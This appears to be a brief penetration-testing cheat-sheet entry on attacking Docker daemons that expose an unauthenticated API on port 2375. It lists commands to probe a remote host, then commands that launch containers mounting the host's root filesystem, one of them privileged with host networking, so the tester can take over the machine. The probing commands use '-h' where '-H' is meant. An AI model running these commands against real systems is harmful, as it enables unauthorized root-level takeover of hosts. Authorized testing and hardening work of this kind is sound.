# 2375 - Docker

Run docker commands against a docker host to verify if it accepts unauthenticated communication or not.

```bash
docker -h 10.10.10.10:2375 container ls
docker -h 10.10.10.10:2375 images ls
```

If it allows unauthenticated communication you can most likely own the host device by creating a new container and mounting the root filesystem.

```bash
docker -H 10.10.10.10:2375 run --rm -it -v /:/mnt victim.azurecr.io/httpd:alpine sh
docker -H 10.10.10.10:2375 run --rm -it --privileged --net=host -v /:/mnt alpine sh
```